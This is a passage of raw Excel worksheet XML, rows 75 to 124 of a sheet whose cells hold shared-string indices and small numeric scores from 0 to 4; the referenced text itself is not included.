      <c r="E75" s="3" t="s">
        <v>521</v>
      </c>
      <c r="F75" s="11">
        <v>0</v>
      </c>
      <c r="G75" s="3" t="s">
        <v>433</v>
      </c>
      <c r="H75" s="11">
        <v>0</v>
      </c>
      <c r="I75" s="3" t="s">
        <v>433</v>
      </c>
    </row>
    <row r="76" spans="1:9" ht="225" x14ac:dyDescent="0.2">
      <c r="A76" s="1" t="s">
        <v>158</v>
      </c>
      <c r="B76" s="1" t="s">
        <v>116</v>
      </c>
      <c r="C76" s="1" t="s">
        <v>159</v>
      </c>
      <c r="D76" s="11">
        <v>1</v>
      </c>
      <c r="E76" s="3" t="s">
        <v>472</v>
      </c>
      <c r="F76" s="11">
        <v>0</v>
      </c>
      <c r="G76" s="3" t="s">
        <v>433</v>
      </c>
      <c r="H76" s="11">
        <v>0</v>
      </c>
      <c r="I76" s="3" t="s">
        <v>433</v>
      </c>
    </row>
    <row r="77" spans="1:9" ht="195" x14ac:dyDescent="0.2">
      <c r="A77" s="1" t="s">
        <v>160</v>
      </c>
      <c r="B77" s="1" t="s">
        <v>116</v>
      </c>
      <c r="C77" s="1" t="s">
        <v>161</v>
      </c>
      <c r="D77" s="11">
        <v>2</v>
      </c>
      <c r="E77" s="3" t="s">
        <v>486</v>
      </c>
      <c r="F77" s="11">
        <v>0</v>
      </c>
      <c r="G77" s="3" t="s">
        <v>433</v>
      </c>
      <c r="H77" s="11">
        <v>0</v>
      </c>
      <c r="I77" s="3" t="s">
        <v>433</v>
      </c>
    </row>
    <row r="78" spans="1:9" ht="409.6" x14ac:dyDescent="0.2">
      <c r="A78" s="1" t="s">
        <v>162</v>
      </c>
      <c r="B78" s="1" t="s">
        <v>116</v>
      </c>
      <c r="C78" s="1" t="s">
        <v>163</v>
      </c>
      <c r="D78" s="11">
        <v>1</v>
      </c>
      <c r="E78" s="3" t="s">
        <v>472</v>
      </c>
      <c r="F78" s="11">
        <v>3</v>
      </c>
      <c r="G78" s="3" t="s">
        <v>522</v>
      </c>
      <c r="H78" s="11">
        <v>0</v>
      </c>
      <c r="I78" s="3" t="s">
        <v>433</v>
      </c>
    </row>
    <row r="79" spans="1:9" ht="210" x14ac:dyDescent="0.2">
      <c r="A79" s="1" t="s">
        <v>164</v>
      </c>
      <c r="B79" s="1" t="s">
        <v>116</v>
      </c>
      <c r="C79" s="1" t="s">
        <v>165</v>
      </c>
      <c r="D79" s="11">
        <v>2</v>
      </c>
      <c r="E79" s="3" t="s">
        <v>523</v>
      </c>
      <c r="F79" s="11">
        <v>0</v>
      </c>
      <c r="G79" s="3" t="s">
        <v>433</v>
      </c>
      <c r="H79" s="11">
        <v>0</v>
      </c>
      <c r="I79" s="3" t="s">
        <v>433</v>
      </c>
    </row>
    <row r="80" spans="1:9" ht="225" x14ac:dyDescent="0.2">
      <c r="A80" s="1" t="s">
        <v>166</v>
      </c>
      <c r="B80" s="1" t="s">
        <v>116</v>
      </c>
      <c r="C80" s="1" t="s">
        <v>167</v>
      </c>
      <c r="D80" s="11">
        <v>2</v>
      </c>
      <c r="E80" s="3" t="s">
        <v>437</v>
      </c>
      <c r="F80" s="11">
        <v>0</v>
      </c>
      <c r="G80" s="3" t="s">
        <v>433</v>
      </c>
      <c r="H80" s="11">
        <v>2</v>
      </c>
      <c r="I80" s="3" t="s">
        <v>507</v>
      </c>
    </row>
    <row r="81" spans="1:9" ht="165" x14ac:dyDescent="0.2">
      <c r="A81" s="1" t="s">
        <v>96</v>
      </c>
      <c r="B81" s="1" t="s">
        <v>116</v>
      </c>
      <c r="C81" s="1" t="s">
        <v>97</v>
      </c>
      <c r="D81" s="11">
        <v>2</v>
      </c>
      <c r="E81" s="3" t="s">
        <v>521</v>
      </c>
      <c r="F81" s="11">
        <v>0</v>
      </c>
      <c r="G81" s="3" t="s">
        <v>433</v>
      </c>
      <c r="H81" s="11">
        <v>0</v>
      </c>
      <c r="I81" s="3" t="s">
        <v>433</v>
      </c>
    </row>
    <row r="82" spans="1:9" ht="225" x14ac:dyDescent="0.2">
      <c r="A82" s="1" t="s">
        <v>168</v>
      </c>
      <c r="B82" s="1" t="s">
        <v>116</v>
      </c>
      <c r="C82" s="1" t="s">
        <v>169</v>
      </c>
      <c r="D82" s="11">
        <v>3</v>
      </c>
      <c r="E82" s="3" t="s">
        <v>521</v>
      </c>
      <c r="F82" s="11">
        <v>0</v>
      </c>
      <c r="G82" s="3" t="s">
        <v>433</v>
      </c>
      <c r="H82" s="11">
        <v>0</v>
      </c>
      <c r="I82" s="3" t="s">
        <v>433</v>
      </c>
    </row>
    <row r="83" spans="1:9" ht="150" x14ac:dyDescent="0.2">
      <c r="A83" s="1" t="s">
        <v>170</v>
      </c>
      <c r="B83" s="1" t="s">
        <v>116</v>
      </c>
      <c r="C83" s="1" t="s">
        <v>171</v>
      </c>
      <c r="D83" s="11">
        <v>2</v>
      </c>
      <c r="E83" s="3" t="s">
        <v>437</v>
      </c>
      <c r="F83" s="11">
        <v>0</v>
      </c>
      <c r="G83" s="3" t="s">
        <v>433</v>
      </c>
      <c r="H83" s="11">
        <v>0</v>
      </c>
      <c r="I83" s="3" t="s">
        <v>433</v>
      </c>
    </row>
    <row r="84" spans="1:9" ht="285" x14ac:dyDescent="0.2">
      <c r="A84" s="1" t="s">
        <v>172</v>
      </c>
      <c r="B84" s="1" t="s">
        <v>116</v>
      </c>
      <c r="C84" s="1" t="s">
        <v>173</v>
      </c>
      <c r="D84" s="11">
        <v>1</v>
      </c>
      <c r="E84" s="3" t="s">
        <v>526</v>
      </c>
      <c r="F84" s="11">
        <v>0</v>
      </c>
      <c r="G84" s="3" t="s">
        <v>433</v>
      </c>
      <c r="H84" s="11">
        <v>0</v>
      </c>
      <c r="I84" s="3" t="s">
        <v>433</v>
      </c>
    </row>
    <row r="85" spans="1:9" ht="120" x14ac:dyDescent="0.2">
      <c r="A85" s="1" t="s">
        <v>174</v>
      </c>
      <c r="B85" s="1" t="s">
        <v>116</v>
      </c>
      <c r="C85" s="1" t="s">
        <v>175</v>
      </c>
      <c r="D85" s="11">
        <v>2</v>
      </c>
      <c r="E85" s="3" t="s">
        <v>521</v>
      </c>
      <c r="F85" s="11">
        <v>0</v>
      </c>
      <c r="G85" s="3" t="s">
        <v>433</v>
      </c>
      <c r="H85" s="11">
        <v>0</v>
      </c>
      <c r="I85" s="3" t="s">
        <v>433</v>
      </c>
    </row>
    <row r="86" spans="1:9" ht="165" x14ac:dyDescent="0.2">
      <c r="A86" s="1" t="s">
        <v>176</v>
      </c>
      <c r="B86" s="1" t="s">
        <v>116</v>
      </c>
      <c r="C86" s="1" t="s">
        <v>177</v>
      </c>
      <c r="D86" s="11">
        <v>1</v>
      </c>
      <c r="E86" s="3" t="s">
        <v>542</v>
      </c>
      <c r="F86" s="11">
        <v>0</v>
      </c>
      <c r="G86" s="3" t="s">
        <v>433</v>
      </c>
      <c r="H86" s="11">
        <v>0</v>
      </c>
      <c r="I86" s="3" t="s">
        <v>433</v>
      </c>
    </row>
    <row r="87" spans="1:9" ht="240" x14ac:dyDescent="0.2">
      <c r="A87" s="1" t="s">
        <v>178</v>
      </c>
      <c r="B87" s="1" t="s">
        <v>116</v>
      </c>
      <c r="C87" s="1" t="s">
        <v>179</v>
      </c>
      <c r="D87" s="11">
        <v>2</v>
      </c>
      <c r="E87" s="3" t="s">
        <v>521</v>
      </c>
      <c r="F87" s="11">
        <v>0</v>
      </c>
      <c r="G87" s="3" t="s">
        <v>433</v>
      </c>
      <c r="H87" s="11">
        <v>0</v>
      </c>
      <c r="I87" s="3" t="s">
        <v>433</v>
      </c>
    </row>
    <row r="88" spans="1:9" ht="120" x14ac:dyDescent="0.2">
      <c r="A88" s="1" t="s">
        <v>106</v>
      </c>
      <c r="B88" s="1" t="s">
        <v>116</v>
      </c>
      <c r="C88" s="1" t="s">
        <v>107</v>
      </c>
      <c r="D88" s="11">
        <v>1</v>
      </c>
      <c r="E88" s="3" t="s">
        <v>521</v>
      </c>
      <c r="F88" s="11">
        <v>0</v>
      </c>
      <c r="G88" s="3" t="s">
        <v>433</v>
      </c>
      <c r="H88" s="11">
        <v>0</v>
      </c>
      <c r="I88" s="3" t="s">
        <v>433</v>
      </c>
    </row>
    <row r="89" spans="1:9" ht="345" x14ac:dyDescent="0.2">
      <c r="A89" s="1" t="s">
        <v>67</v>
      </c>
      <c r="B89" s="1" t="s">
        <v>116</v>
      </c>
      <c r="C89" s="1" t="s">
        <v>180</v>
      </c>
      <c r="D89" s="11">
        <v>3</v>
      </c>
      <c r="E89" s="3" t="s">
        <v>551</v>
      </c>
      <c r="F89" s="11">
        <v>4</v>
      </c>
      <c r="G89" s="3" t="s">
        <v>439</v>
      </c>
      <c r="H89" s="11">
        <v>2</v>
      </c>
      <c r="I89" s="3" t="s">
        <v>442</v>
      </c>
    </row>
    <row r="90" spans="1:9" ht="150" x14ac:dyDescent="0.2">
      <c r="A90" s="1" t="s">
        <v>181</v>
      </c>
      <c r="B90" s="1" t="s">
        <v>116</v>
      </c>
      <c r="C90" s="1" t="s">
        <v>182</v>
      </c>
      <c r="D90" s="11">
        <v>2</v>
      </c>
      <c r="E90" s="3" t="s">
        <v>559</v>
      </c>
      <c r="F90" s="11">
        <v>4</v>
      </c>
      <c r="G90" s="3" t="s">
        <v>439</v>
      </c>
      <c r="H90" s="11">
        <v>3</v>
      </c>
      <c r="I90" s="3" t="s">
        <v>560</v>
      </c>
    </row>
    <row r="91" spans="1:9" ht="135" x14ac:dyDescent="0.2">
      <c r="A91" s="1" t="s">
        <v>183</v>
      </c>
      <c r="B91" s="1" t="s">
        <v>116</v>
      </c>
      <c r="C91" s="1" t="s">
        <v>184</v>
      </c>
      <c r="D91" s="11">
        <v>3</v>
      </c>
      <c r="E91" s="3" t="s">
        <v>558</v>
      </c>
      <c r="F91" s="11">
        <v>0</v>
      </c>
      <c r="G91" s="3" t="s">
        <v>433</v>
      </c>
      <c r="H91" s="11">
        <v>2</v>
      </c>
      <c r="I91" s="3" t="s">
        <v>556</v>
      </c>
    </row>
    <row r="92" spans="1:9" ht="300" x14ac:dyDescent="0.2">
      <c r="A92" s="1" t="s">
        <v>185</v>
      </c>
      <c r="B92" s="1" t="s">
        <v>116</v>
      </c>
      <c r="C92" s="1" t="s">
        <v>186</v>
      </c>
      <c r="D92" s="11">
        <v>3</v>
      </c>
      <c r="E92" s="3" t="s">
        <v>521</v>
      </c>
      <c r="F92" s="11">
        <v>0</v>
      </c>
      <c r="G92" s="3" t="s">
        <v>433</v>
      </c>
      <c r="H92" s="11">
        <v>0</v>
      </c>
      <c r="I92" s="3" t="s">
        <v>433</v>
      </c>
    </row>
    <row r="93" spans="1:9" ht="285" x14ac:dyDescent="0.2">
      <c r="A93" s="1" t="s">
        <v>187</v>
      </c>
      <c r="B93" s="1" t="s">
        <v>189</v>
      </c>
      <c r="C93" s="1" t="s">
        <v>190</v>
      </c>
      <c r="D93" s="11">
        <v>2</v>
      </c>
      <c r="E93" s="3" t="s">
        <v>453</v>
      </c>
      <c r="F93" s="11">
        <v>4</v>
      </c>
      <c r="G93" s="3" t="s">
        <v>454</v>
      </c>
      <c r="H93" s="11">
        <v>1</v>
      </c>
      <c r="I93" s="3" t="s">
        <v>455</v>
      </c>
    </row>
    <row r="94" spans="1:9" ht="120" x14ac:dyDescent="0.2">
      <c r="A94" s="1" t="s">
        <v>191</v>
      </c>
      <c r="B94" s="1" t="s">
        <v>189</v>
      </c>
      <c r="C94" s="1" t="s">
        <v>192</v>
      </c>
      <c r="D94" s="11">
        <v>2</v>
      </c>
      <c r="E94" s="3" t="s">
        <v>453</v>
      </c>
      <c r="F94" s="11">
        <v>4</v>
      </c>
      <c r="G94" s="3" t="s">
        <v>454</v>
      </c>
      <c r="H94" s="11">
        <v>1</v>
      </c>
      <c r="I94" s="3" t="s">
        <v>455</v>
      </c>
    </row>
    <row r="95" spans="1:9" ht="240" x14ac:dyDescent="0.2">
      <c r="A95" s="1" t="s">
        <v>193</v>
      </c>
      <c r="B95" s="1" t="s">
        <v>189</v>
      </c>
      <c r="C95" s="1" t="s">
        <v>194</v>
      </c>
      <c r="D95" s="11">
        <v>2</v>
      </c>
      <c r="E95" s="3" t="s">
        <v>459</v>
      </c>
      <c r="F95" s="11">
        <v>4</v>
      </c>
      <c r="G95" s="3" t="s">
        <v>439</v>
      </c>
      <c r="H95" s="11">
        <v>3</v>
      </c>
      <c r="I95" s="3" t="s">
        <v>440</v>
      </c>
    </row>
    <row r="96" spans="1:9" ht="60" x14ac:dyDescent="0.2">
      <c r="A96" s="1" t="s">
        <v>195</v>
      </c>
      <c r="B96" s="1" t="s">
        <v>189</v>
      </c>
      <c r="C96" s="1" t="s">
        <v>196</v>
      </c>
      <c r="D96" s="11">
        <v>2</v>
      </c>
      <c r="E96" s="3" t="s">
        <v>461</v>
      </c>
      <c r="F96" s="11">
        <v>4</v>
      </c>
      <c r="G96" s="3" t="s">
        <v>454</v>
      </c>
      <c r="H96" s="11">
        <v>1</v>
      </c>
      <c r="I96" s="3" t="s">
        <v>440</v>
      </c>
    </row>
    <row r="97" spans="1:9" ht="165" x14ac:dyDescent="0.2">
      <c r="A97" s="1" t="s">
        <v>197</v>
      </c>
      <c r="B97" s="1" t="s">
        <v>189</v>
      </c>
      <c r="C97" s="1" t="s">
        <v>198</v>
      </c>
      <c r="D97" s="11">
        <v>2</v>
      </c>
      <c r="E97" s="3" t="s">
        <v>461</v>
      </c>
      <c r="F97" s="11">
        <v>4</v>
      </c>
      <c r="G97" s="3" t="s">
        <v>439</v>
      </c>
      <c r="H97" s="11">
        <v>0</v>
      </c>
      <c r="I97" s="3" t="s">
        <v>433</v>
      </c>
    </row>
    <row r="98" spans="1:9" ht="75" x14ac:dyDescent="0.2">
      <c r="A98" s="1" t="s">
        <v>199</v>
      </c>
      <c r="B98" s="1" t="s">
        <v>189</v>
      </c>
      <c r="C98" s="1" t="s">
        <v>200</v>
      </c>
      <c r="D98" s="11">
        <v>2</v>
      </c>
      <c r="E98" s="3" t="s">
        <v>465</v>
      </c>
      <c r="F98" s="11">
        <v>1</v>
      </c>
      <c r="G98" s="3" t="s">
        <v>466</v>
      </c>
      <c r="H98" s="11">
        <v>3</v>
      </c>
      <c r="I98" s="3" t="s">
        <v>466</v>
      </c>
    </row>
    <row r="99" spans="1:9" ht="120" x14ac:dyDescent="0.2">
      <c r="A99" s="1" t="s">
        <v>201</v>
      </c>
      <c r="B99" s="1" t="s">
        <v>189</v>
      </c>
      <c r="C99" s="1" t="s">
        <v>202</v>
      </c>
      <c r="D99" s="11">
        <v>1</v>
      </c>
      <c r="E99" s="3" t="s">
        <v>467</v>
      </c>
      <c r="F99" s="11">
        <v>1</v>
      </c>
      <c r="G99" s="3" t="s">
        <v>467</v>
      </c>
      <c r="H99" s="11">
        <v>3</v>
      </c>
      <c r="I99" s="3" t="s">
        <v>467</v>
      </c>
    </row>
    <row r="100" spans="1:9" ht="240" x14ac:dyDescent="0.2">
      <c r="A100" s="1" t="s">
        <v>203</v>
      </c>
      <c r="B100" s="1" t="s">
        <v>189</v>
      </c>
      <c r="C100" s="1" t="s">
        <v>204</v>
      </c>
      <c r="D100" s="11">
        <v>0</v>
      </c>
      <c r="E100" s="3" t="s">
        <v>579</v>
      </c>
      <c r="F100" s="11">
        <v>2</v>
      </c>
      <c r="G100" s="3" t="s">
        <v>580</v>
      </c>
      <c r="H100" s="11">
        <v>0</v>
      </c>
      <c r="I100" s="3" t="s">
        <v>433</v>
      </c>
    </row>
    <row r="101" spans="1:9" ht="45" x14ac:dyDescent="0.2">
      <c r="A101" s="1" t="s">
        <v>205</v>
      </c>
      <c r="B101" s="1" t="s">
        <v>189</v>
      </c>
      <c r="C101" s="1" t="s">
        <v>206</v>
      </c>
      <c r="D101" s="11">
        <v>2</v>
      </c>
      <c r="E101" s="3" t="s">
        <v>493</v>
      </c>
      <c r="F101" s="11">
        <v>3</v>
      </c>
      <c r="G101" s="3" t="s">
        <v>439</v>
      </c>
      <c r="H101" s="11">
        <v>0</v>
      </c>
      <c r="I101" s="3" t="s">
        <v>433</v>
      </c>
    </row>
    <row r="102" spans="1:9" ht="270" x14ac:dyDescent="0.2">
      <c r="A102" s="1" t="s">
        <v>207</v>
      </c>
      <c r="B102" s="1" t="s">
        <v>189</v>
      </c>
      <c r="C102" s="1" t="s">
        <v>208</v>
      </c>
      <c r="D102" s="11">
        <v>2</v>
      </c>
      <c r="E102" s="3" t="s">
        <v>459</v>
      </c>
      <c r="F102" s="11">
        <v>4</v>
      </c>
      <c r="G102" s="3" t="s">
        <v>439</v>
      </c>
      <c r="H102" s="11">
        <v>0</v>
      </c>
      <c r="I102" s="3" t="s">
        <v>433</v>
      </c>
    </row>
    <row r="103" spans="1:9" ht="105" x14ac:dyDescent="0.2">
      <c r="A103" s="1" t="s">
        <v>209</v>
      </c>
      <c r="B103" s="1" t="s">
        <v>189</v>
      </c>
      <c r="C103" s="1" t="s">
        <v>210</v>
      </c>
      <c r="D103" s="11">
        <v>2</v>
      </c>
      <c r="E103" s="3" t="s">
        <v>459</v>
      </c>
      <c r="F103" s="11">
        <v>4</v>
      </c>
      <c r="G103" s="3" t="s">
        <v>439</v>
      </c>
      <c r="H103" s="11">
        <v>0</v>
      </c>
      <c r="I103" s="3" t="s">
        <v>433</v>
      </c>
    </row>
    <row r="104" spans="1:9" ht="75" x14ac:dyDescent="0.2">
      <c r="A104" s="1" t="s">
        <v>211</v>
      </c>
      <c r="B104" s="1" t="s">
        <v>189</v>
      </c>
      <c r="C104" s="1" t="s">
        <v>212</v>
      </c>
      <c r="D104" s="11">
        <v>2</v>
      </c>
      <c r="E104" s="3" t="s">
        <v>459</v>
      </c>
      <c r="F104" s="11">
        <v>4</v>
      </c>
      <c r="G104" s="3" t="s">
        <v>439</v>
      </c>
      <c r="H104" s="11">
        <v>0</v>
      </c>
      <c r="I104" s="3" t="s">
        <v>433</v>
      </c>
    </row>
    <row r="105" spans="1:9" ht="270" x14ac:dyDescent="0.2">
      <c r="A105" s="1" t="s">
        <v>213</v>
      </c>
      <c r="B105" s="1" t="s">
        <v>189</v>
      </c>
      <c r="C105" s="1" t="s">
        <v>214</v>
      </c>
      <c r="D105" s="11">
        <v>2</v>
      </c>
      <c r="E105" s="3" t="s">
        <v>459</v>
      </c>
      <c r="F105" s="11">
        <v>3</v>
      </c>
      <c r="G105" s="3" t="s">
        <v>581</v>
      </c>
      <c r="H105" s="11">
        <v>0</v>
      </c>
      <c r="I105" s="3" t="s">
        <v>433</v>
      </c>
    </row>
    <row r="106" spans="1:9" ht="135" x14ac:dyDescent="0.2">
      <c r="A106" s="1" t="s">
        <v>215</v>
      </c>
      <c r="B106" s="1" t="s">
        <v>189</v>
      </c>
      <c r="C106" s="1" t="s">
        <v>216</v>
      </c>
      <c r="D106" s="11">
        <v>2</v>
      </c>
      <c r="E106" s="3" t="s">
        <v>543</v>
      </c>
      <c r="F106" s="11">
        <v>4</v>
      </c>
      <c r="G106" s="3" t="s">
        <v>439</v>
      </c>
      <c r="H106" s="11">
        <v>3</v>
      </c>
      <c r="I106" s="3" t="s">
        <v>440</v>
      </c>
    </row>
    <row r="107" spans="1:9" ht="135" x14ac:dyDescent="0.2">
      <c r="A107" s="1" t="s">
        <v>217</v>
      </c>
      <c r="B107" s="1" t="s">
        <v>189</v>
      </c>
      <c r="C107" s="1" t="s">
        <v>218</v>
      </c>
      <c r="D107" s="11">
        <v>1</v>
      </c>
      <c r="F107" s="11">
        <v>0</v>
      </c>
      <c r="G107" s="3" t="s">
        <v>544</v>
      </c>
      <c r="H107" s="11">
        <v>0</v>
      </c>
      <c r="I107" s="3" t="s">
        <v>545</v>
      </c>
    </row>
    <row r="108" spans="1:9" ht="180" x14ac:dyDescent="0.2">
      <c r="A108" s="1" t="s">
        <v>219</v>
      </c>
      <c r="B108" s="1" t="s">
        <v>189</v>
      </c>
      <c r="C108" s="1" t="s">
        <v>220</v>
      </c>
      <c r="D108" s="11">
        <v>2</v>
      </c>
      <c r="E108" s="3" t="s">
        <v>543</v>
      </c>
      <c r="F108" s="11">
        <v>4</v>
      </c>
      <c r="G108" s="3" t="s">
        <v>439</v>
      </c>
      <c r="H108" s="11">
        <v>3</v>
      </c>
      <c r="I108" s="3" t="s">
        <v>440</v>
      </c>
    </row>
    <row r="109" spans="1:9" ht="30" x14ac:dyDescent="0.2">
      <c r="A109" s="1" t="s">
        <v>221</v>
      </c>
      <c r="B109" s="1" t="s">
        <v>189</v>
      </c>
      <c r="C109" s="1" t="s">
        <v>222</v>
      </c>
      <c r="D109" s="11">
        <v>3</v>
      </c>
      <c r="E109" s="3" t="s">
        <v>552</v>
      </c>
      <c r="F109" s="11">
        <v>4</v>
      </c>
      <c r="G109" s="3" t="s">
        <v>439</v>
      </c>
      <c r="H109" s="11">
        <v>1</v>
      </c>
      <c r="I109" s="3" t="s">
        <v>442</v>
      </c>
    </row>
    <row r="110" spans="1:9" ht="300" x14ac:dyDescent="0.2">
      <c r="A110" s="1" t="s">
        <v>223</v>
      </c>
      <c r="B110" s="1" t="s">
        <v>189</v>
      </c>
      <c r="C110" s="1" t="s">
        <v>224</v>
      </c>
      <c r="D110" s="11">
        <v>1</v>
      </c>
      <c r="E110" s="3" t="s">
        <v>561</v>
      </c>
      <c r="F110" s="11">
        <v>4</v>
      </c>
      <c r="G110" s="3" t="s">
        <v>439</v>
      </c>
      <c r="H110" s="11">
        <v>0</v>
      </c>
      <c r="I110" s="3" t="s">
        <v>433</v>
      </c>
    </row>
    <row r="111" spans="1:9" ht="409.6" x14ac:dyDescent="0.2">
      <c r="A111" s="1" t="s">
        <v>225</v>
      </c>
      <c r="B111" s="1" t="s">
        <v>227</v>
      </c>
      <c r="C111" s="1" t="s">
        <v>228</v>
      </c>
      <c r="D111" s="11">
        <v>1</v>
      </c>
      <c r="E111" s="1" t="s">
        <v>419</v>
      </c>
      <c r="F111" s="11">
        <v>0</v>
      </c>
      <c r="G111" s="3" t="s">
        <v>420</v>
      </c>
      <c r="H111" s="11">
        <v>0</v>
      </c>
      <c r="I111" s="3" t="s">
        <v>421</v>
      </c>
    </row>
    <row r="112" spans="1:9" ht="225" x14ac:dyDescent="0.2">
      <c r="A112" s="1" t="s">
        <v>118</v>
      </c>
      <c r="B112" s="1" t="s">
        <v>227</v>
      </c>
      <c r="C112" s="1" t="s">
        <v>229</v>
      </c>
      <c r="D112" s="11">
        <v>3</v>
      </c>
      <c r="E112" s="1" t="s">
        <v>424</v>
      </c>
      <c r="F112" s="11">
        <v>3</v>
      </c>
      <c r="G112" s="3" t="s">
        <v>425</v>
      </c>
      <c r="H112" s="11">
        <v>2</v>
      </c>
      <c r="I112" s="3" t="s">
        <v>426</v>
      </c>
    </row>
    <row r="113" spans="1:9" ht="210" x14ac:dyDescent="0.2">
      <c r="A113" s="1" t="s">
        <v>120</v>
      </c>
      <c r="B113" s="1" t="s">
        <v>227</v>
      </c>
      <c r="C113" s="1" t="s">
        <v>121</v>
      </c>
      <c r="D113" s="11">
        <v>1</v>
      </c>
      <c r="E113" s="3" t="s">
        <v>434</v>
      </c>
      <c r="F113" s="11">
        <v>0</v>
      </c>
      <c r="G113" s="3" t="s">
        <v>433</v>
      </c>
      <c r="H113" s="11">
        <v>0</v>
      </c>
      <c r="I113" s="3" t="s">
        <v>433</v>
      </c>
    </row>
    <row r="114" spans="1:9" ht="195" x14ac:dyDescent="0.2">
      <c r="A114" s="1" t="s">
        <v>122</v>
      </c>
      <c r="B114" s="1" t="s">
        <v>227</v>
      </c>
      <c r="C114" s="1" t="s">
        <v>230</v>
      </c>
      <c r="D114" s="11">
        <v>1</v>
      </c>
      <c r="E114" s="3" t="s">
        <v>434</v>
      </c>
      <c r="F114" s="11">
        <v>0</v>
      </c>
      <c r="G114" s="3" t="s">
        <v>433</v>
      </c>
      <c r="H114" s="11">
        <v>0</v>
      </c>
      <c r="I114" s="3" t="s">
        <v>433</v>
      </c>
    </row>
    <row r="115" spans="1:9" ht="135" x14ac:dyDescent="0.2">
      <c r="A115" s="1" t="s">
        <v>124</v>
      </c>
      <c r="B115" s="1" t="s">
        <v>227</v>
      </c>
      <c r="C115" s="1" t="s">
        <v>231</v>
      </c>
      <c r="D115" s="11">
        <v>3</v>
      </c>
      <c r="E115" s="3" t="s">
        <v>436</v>
      </c>
      <c r="F115" s="11">
        <v>0</v>
      </c>
      <c r="G115" s="3" t="s">
        <v>433</v>
      </c>
      <c r="H115" s="11">
        <v>0</v>
      </c>
      <c r="I115" s="3" t="s">
        <v>433</v>
      </c>
    </row>
    <row r="116" spans="1:9" ht="409.6" x14ac:dyDescent="0.2">
      <c r="A116" s="1" t="s">
        <v>232</v>
      </c>
      <c r="B116" s="1" t="s">
        <v>227</v>
      </c>
      <c r="C116" s="1" t="s">
        <v>233</v>
      </c>
      <c r="D116" s="11">
        <v>1</v>
      </c>
      <c r="E116" s="3" t="s">
        <v>449</v>
      </c>
      <c r="F116" s="11">
        <v>0</v>
      </c>
      <c r="G116" s="3" t="s">
        <v>433</v>
      </c>
      <c r="H116" s="11">
        <v>0</v>
      </c>
      <c r="I116" s="3" t="s">
        <v>433</v>
      </c>
    </row>
    <row r="117" spans="1:9" ht="120" x14ac:dyDescent="0.2">
      <c r="A117" s="1" t="s">
        <v>142</v>
      </c>
      <c r="B117" s="1" t="s">
        <v>227</v>
      </c>
      <c r="C117" s="1" t="s">
        <v>234</v>
      </c>
      <c r="D117" s="11">
        <v>3</v>
      </c>
      <c r="E117" s="3" t="s">
        <v>476</v>
      </c>
      <c r="F117" s="11">
        <v>0</v>
      </c>
      <c r="G117" s="3" t="s">
        <v>433</v>
      </c>
      <c r="H117" s="11">
        <v>0</v>
      </c>
      <c r="I117" s="3" t="s">
        <v>433</v>
      </c>
    </row>
    <row r="118" spans="1:9" ht="270" x14ac:dyDescent="0.2">
      <c r="A118" s="1" t="s">
        <v>235</v>
      </c>
      <c r="B118" s="1" t="s">
        <v>227</v>
      </c>
      <c r="C118" s="1" t="s">
        <v>236</v>
      </c>
      <c r="D118" s="11">
        <v>2</v>
      </c>
      <c r="E118" s="3" t="s">
        <v>490</v>
      </c>
      <c r="F118" s="11">
        <v>0</v>
      </c>
      <c r="G118" s="3" t="s">
        <v>433</v>
      </c>
      <c r="H118" s="11">
        <v>0</v>
      </c>
      <c r="I118" s="3" t="s">
        <v>433</v>
      </c>
    </row>
    <row r="119" spans="1:9" ht="150" x14ac:dyDescent="0.2">
      <c r="A119" s="1" t="s">
        <v>237</v>
      </c>
      <c r="B119" s="1" t="s">
        <v>227</v>
      </c>
      <c r="C119" s="1" t="s">
        <v>238</v>
      </c>
      <c r="D119" s="11">
        <v>0</v>
      </c>
      <c r="E119" s="3" t="s">
        <v>492</v>
      </c>
      <c r="F119" s="11">
        <v>0</v>
      </c>
      <c r="G119" s="3" t="s">
        <v>433</v>
      </c>
      <c r="H119" s="11">
        <v>0</v>
      </c>
      <c r="I119" s="3" t="s">
        <v>433</v>
      </c>
    </row>
    <row r="120" spans="1:9" ht="75" x14ac:dyDescent="0.2">
      <c r="A120" s="1" t="s">
        <v>146</v>
      </c>
      <c r="B120" s="1" t="s">
        <v>227</v>
      </c>
      <c r="C120" s="1" t="s">
        <v>239</v>
      </c>
      <c r="D120" s="11">
        <v>1</v>
      </c>
      <c r="E120" s="3" t="s">
        <v>497</v>
      </c>
      <c r="F120" s="11">
        <v>0</v>
      </c>
      <c r="G120" s="3" t="s">
        <v>433</v>
      </c>
      <c r="H120" s="11">
        <v>0</v>
      </c>
      <c r="I120" s="3" t="s">
        <v>433</v>
      </c>
    </row>
    <row r="121" spans="1:9" ht="330" x14ac:dyDescent="0.2">
      <c r="A121" s="1" t="s">
        <v>152</v>
      </c>
      <c r="B121" s="1" t="s">
        <v>227</v>
      </c>
      <c r="C121" s="1" t="s">
        <v>153</v>
      </c>
      <c r="D121" s="11">
        <v>1</v>
      </c>
      <c r="E121" s="3" t="s">
        <v>506</v>
      </c>
      <c r="F121" s="11">
        <v>0</v>
      </c>
      <c r="G121" s="3" t="s">
        <v>433</v>
      </c>
      <c r="H121" s="11">
        <v>1</v>
      </c>
      <c r="I121" s="3" t="s">
        <v>507</v>
      </c>
    </row>
    <row r="122" spans="1:9" ht="195" x14ac:dyDescent="0.2">
      <c r="A122" s="1" t="s">
        <v>160</v>
      </c>
      <c r="B122" s="1" t="s">
        <v>227</v>
      </c>
      <c r="C122" s="1" t="s">
        <v>161</v>
      </c>
      <c r="D122" s="11">
        <v>2</v>
      </c>
      <c r="E122" s="3" t="s">
        <v>486</v>
      </c>
      <c r="F122" s="11">
        <v>0</v>
      </c>
      <c r="G122" s="3" t="s">
        <v>433</v>
      </c>
      <c r="H122" s="11">
        <v>0</v>
      </c>
      <c r="I122" s="3" t="s">
        <v>433</v>
      </c>
    </row>
    <row r="123" spans="1:9" ht="210" x14ac:dyDescent="0.2">
      <c r="A123" s="1" t="s">
        <v>164</v>
      </c>
      <c r="B123" s="1" t="s">
        <v>227</v>
      </c>
      <c r="C123" s="1" t="s">
        <v>165</v>
      </c>
      <c r="D123" s="11">
        <v>2</v>
      </c>
      <c r="E123" s="3" t="s">
        <v>523</v>
      </c>
      <c r="F123" s="11">
        <v>0</v>
      </c>
      <c r="G123" s="3" t="s">
        <v>433</v>
      </c>
      <c r="H123" s="11">
        <v>0</v>
      </c>
      <c r="I123" s="3" t="s">
        <v>433</v>
      </c>
    </row>
    <row r="124" spans="1:9" ht="225" x14ac:dyDescent="0.2">
      <c r="A124" s="1" t="s">
        <v>166</v>
      </c>
      <c r="B124" s="1" t="s">
        <v>227</v>
      </c>
      <c r="C124" s="1" t="s">
        <v>167</v>
      </c>
